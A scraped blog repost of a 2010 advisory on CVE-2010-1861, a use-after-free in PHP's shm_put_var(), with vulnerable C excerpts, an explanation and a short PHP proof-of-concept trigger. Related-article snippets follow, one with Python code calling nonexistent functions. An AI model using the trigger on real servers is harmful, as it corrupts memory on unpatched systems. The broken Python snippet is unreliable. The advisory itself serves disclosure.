php shm,PHP shm_put_var()访问已释放资源漏洞

最新推荐文章于 2021-05-25 17:36:52 发布
最新推荐文章于 2021-05-25 17:36:52 发布
阅读量104 收藏
点赞数
文章标签: php shm

发布日期:2010-05-05

更新日期:2010-05-10

受影响系统:

PHP PHP <= 5.3.2

PHP PHP <= 5.2.13

描述:

--------------------------------------------------------------------------------

CVE ID: CVE-2010-1861

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

当PHP函数需要追踪数据结构时,会使用Zend引擎注册资源。资源系统中的引用计数器仅会追踪指向实际资源的PHP变量,不会计算有多少函数在内部使用资源,这就在PHP代码中引入了漏洞。如果用户代码可以在PHP函数通过资源标识符获得了资源数据后中断该函数,就可以释放资源然后在内存中同样的位置分配同样大小的PHP字符串。可利用这个PHP字符串创建特制的资源允许利用PHP函数的内部。当恶意中断结束后,函数就会继续,使用已被替换的资源数据。

其中的一个有漏洞函数是sysvshm扩展的shm_put_var()函数:

PHP_FUNCTION(shm_put_var)

{

...

if (SUCCESS != zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rlz", &shm_id, &shm_key, &arg_var)) {

return;

}

SHM_FETCH_RESOURCE(shm_list_ptr, shm_id);

/* setup string-variable and serialize */

PHP_VAR_SERIALIZE_INIT(var_hash);

php_var_serialize(&shm_var, &arg_var, &var_hash TSRMLS_CC);

PHP_VAR_SERIALIZE_DESTROY(var_hash);

/* insert serialized variable into shared memory */

ret = php_put_shm_data(shm_list_ptr->ptr, shm_key, shm_var.c, shm_var.len);

shm_put_var()内部调用了序列化功能,该功能也会序列化对象并调用对象的__sleep()方式。这个__sleep()方式之后可以释放shm资源,允许替换内存中在php_put_shm_data()调用中使用的shm_list_ptr结构,这会写入任意受控的内存。

static int php_put_shm_data(sysvshm_chunk_head *ptr, long key, const char *data, long len)

{

sysvshm_chunk *shm_var;

long total_size;

long shm_varpos;

...

shm_var = (sysvshm_chunk *) ((char *) ptr + ptr->end);

shm_var->key = key;

shm_var->length = len;

shm_var->next = total_size;

memcpy(&(shm_var->mem), data, len);

ptr->end += total_size;

ptr->free -= total_size;

return 0;

链接:http://php-security.org/2010/05/05/mops-2010-009-php-shm_put_var-already-freed-resource-access-vulnerability/index.html

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

class dummy

{

function __sleep()

{

shm_detach($GLOBALS['r']);

$GLOBALS['xxxxxxxxxxxxxxxxxxxxxxxxxxxxA'] = "AAAAAAAABBB";

$GLOBALS['xxxxxxxxxxxxxxxxxxxxxxxxxxxxx'] = "AAAAAAAABBBBBBBBCCCCCCC";

return array();

}

}

$r = shm_attach(0x7350);

shm_put_var($r, 0x31337, new dummy());

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net0b1331709591d260c1c78e86d0c51c18.png

HardessLee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shm.rar_linux shm_shm_shm 封装
09-22
标题中的"shm.rar_linux shm_shm_shm 封装"指出,这是一个关于Linux下的共享内存封装库,可能是由个人开发的自定义实现。 共享内存的优势在于它无需通过传统的I/O操作来传递数据,而是直接在内存中读写,从而提高了...
shm.rar_shm_windows shm.h_共享内存
09-19
标题中的"shm.rar_shm_windows shm.h_共享内存"表明这是一个关于在Windows环境下实现共享内存功能的资源包,可能包含了一个库文件,用于简化共享内存的操作。 描述中提到"共享内存源代码,本人提供共享内存操作的库...
Docker容器中运行pytorch模型shared memory(shm)不足的解决方法
weixin_38267786的博客
05-25 3667
错误信息 ERROR: Unexpected bus error encountered in worker. This might be caused by insufficient shared memory (shm). Traceback (most recent call last): File "train_raf-db.py", line 214, in <module> run_training() File "train_raf-db.py", line 158
shm_put_var php,PHP shm_put_var()访问释放资源漏洞
weixin_31787839的博客
03-31 132
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。当PHP函数需要追踪数据结构时,会使用Zend引擎注册资源。发布日期:2010-05-05更新日期:2010-05-10受影响系统:PHP PHP <= 5.3.2PHP PHP <= 5.2.13描述:-----------------------------------------------------...
php实现共享内存进程通信函数之shm
weixin_44056915的博客
01-09 391
前面介绍了php实现共享内存的一个函数shmop,也应用到了项目中,不过shmop有局限性,那就是只支持字符串类型的; sem经过我的测试,是混合型,支持数组类型,可以直接存储,直接获取,少了多余的步骤格式转换。 不过sem有大小限制,shmop可以设置很大很大很大~~~不过也可以再php.ini修改相关配置。 <?php $key = 0x4337b124; $shar_key =...
shm php,PHP共享内存用法实例分析
weixin_31937319的博客
03-09 189
本文实例讲述了PHP共享内存用法。分享给大家供大家参考,具体如下:共享内存主要用于进程间通信php中的共享内存有两套扩展可以实现1、shmop 编译时需要开启 --enable-shmop 参数实例:$shm_key = ftok(__FILE__, 't');/**开辟一块共享内存int $key , string $flags , int $mode , int $size$flags: a...
php实现共享内存进程通信函数之_shm
weixin_30555515的博客
06-06 79
前面介绍了php实现共享内存的一个函数shmop,也应用到了项目中,不过shmop有局限性,那就是只支持字符串类型的;sem经过我的测试,是混合型,支持数组类型,可以直接存储,直接获取,少了多余的步骤格式转换。不过sem有大小限制,shmop可以设置很大很大很大~~~不过也可以再php.ini修改相关配置。 <?php $key = 0x4337b124; $shar_key ...
shm.rar_shm 数据_共享内存_进程共享内存
09-23
标题中的“shm.rar_shm 数据_共享内存_进程共享内存”指的是一个关于Linux系统中使用共享内存(Shared Memory)进行进程间通信的示例或教程。在这个案例中,多个进程会周期性地将数据写入共享内存区域,而另一个进程...
shm.rar_linux shm_共享内存 Linux_共享内存 封装
09-24
linux下实现对共享内存的操作等等,对posix提供的接口进行封装
PHASE II OF THE ASCE BENCHMARK STUDY ON SHM.rar_BENCHMARK ASCE_a
07-14
PHASE II OF THE ASCE BENCHMARK STUDY ON SHM
shm php,PHP共享内存的使用
weixin_42349261的博客
03-09 339
php有两套使用共享内存的函数,一套是System VIPC函数的封装,另一套是shmop。这两个都无需安装外部库文件。前者只能在linux下使用,而且要使用它的话,在安装php的时候要加上–enable-sysvshm选项;而后者在linux和windows(win2k之后的系统,win98不支持)都可以使用,但在windows的时候,只有在php是ISAPI运行模式才能正常工作,在安装php的...
PHP shm_put_var()访问释放资源漏洞
创业的程序员
06-16 211
发布日期:2010-05-05 更新日期:2010-05-10 受影响系统: PHP PHP PHP PHP 描述: -------------------------------------------------------------------------------- CVE ID: CVE-2010-1861 PHP是广泛使用的通用目的脚本语言,特别适合于Web...
php shm,PHP 的自带内存共享 APCu 和 shm
weixin_32593879的博客
03-10 183
APCuphp.ini需要配置:extension=php_apcu.dllapc.enabled=1apc.shm_size=32Mapc.enable_cli=1具体配置可查看http://php.net/manual/zh/apcu.configuration.phpclass APCu{public static function get($key){return json_decode(...
shm php,php实现共享内存进程通信函数(_shm
weixin_32520601的博客
03-09 135
这篇文章主要介绍了关于php实现共享内存进程通信函数(_shm),有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下前面介绍了php实现共享内存的一个函数shmop,也应用到了项目中,不过shmop有局限性,那就是只支持字符串类型的;sem经过我的测试,是混合型,支持数组类型,可以直接存储,直接获取,少了多余的步骤格式转换。不过sem有大小限制,shmop可以设置很大很大很大~~~不过也...
php中simplexml_load_file()函数用法详细
暗淡亮点的博客
10-28 3049
武汉xxx公司张三a1李四b2王五c3台北板桥桃园   header("content-type:text/html; charset=utf-8"); //设置编码$xml = simplexml_load_file('a.xml'); //载入xml文件 $lists和xml文件的根节点是一样的echo $xml->company."";echo $xml->town."id:";echo
shm php,PHP shm_get_var 用法 手册 | 示例代码
weixin_39823269的博客
03-09 172
public$nPermissions;public$nKey;public$nBytesMemorySize;public$nShmId;public$nVarKey;public$mVar;public function__construct($nKey,$nBytesMemorySize=50000,$nPermissions=0666) {$this->nKey=$nKey;$thi...
shm_np_array
最新发布
06-21
"shm_np_array"通常指的是在System V共享内存(Shared Memory)上创建和操作NumPy数组的一种方式。NumPy是一个Python库,用于处理大型多维数组和矩阵,而System V共享内存允许不同进程之间共享内存区域。 在Python中,可以使用`numpy`库创建数组,然后通过`mmap`(memory-mapped file)功能与System V共享内存关联起来。以下是一个简单的示例: ```python import numpy as np import mmap # 创建一个numpy数组 shm_array = np.zeros((100, 100), dtype=np.int32) # 将数组映射到共享内存 shmid = shm_open("/path/to/shm", flags=mmap.O_RDWR | mmap.O_CREAT) mmap_obj = mmap.mmap(shmid, shm_array.nbytes, access=mmap.ACCESS_WRITE) # 在共享内存上操作数组 mmap_obj[:] = shm_array.reshape(-1) # 或者 mmap_obj = np.frombuffer(mmap_obj, dtype=np.int32).reshape(shm_array.shape) # 从共享内存读取数组 read_array = np.frombuffer(mmap_obj, dtype=np.int32).reshape(shm_array.shape) # 关闭和结束共享内存 mmap_obj.close() munmap(shmid, shm_array.nbytes) ``` 在这个例子中,`shm_open`和`munmap`是Unix系统调用,用于创建和删除共享内存区域,`mmap`则是用于在不同的进程间共享这个内存区域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值